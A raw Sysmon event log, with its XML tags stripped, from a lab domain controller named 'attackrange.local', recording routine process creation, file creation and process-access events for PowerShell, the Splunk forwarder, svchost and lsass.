12:01:05.371{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.355{266CAFBE-647F-6064-5000-00000000AE01}3024NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.355{266CAFBE-6481-6064-5800-00000000AE01}4000NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.299{266CAFBE-6481-6064-5800-00000000AE01}40003228C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.039{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
10341000x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.971{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\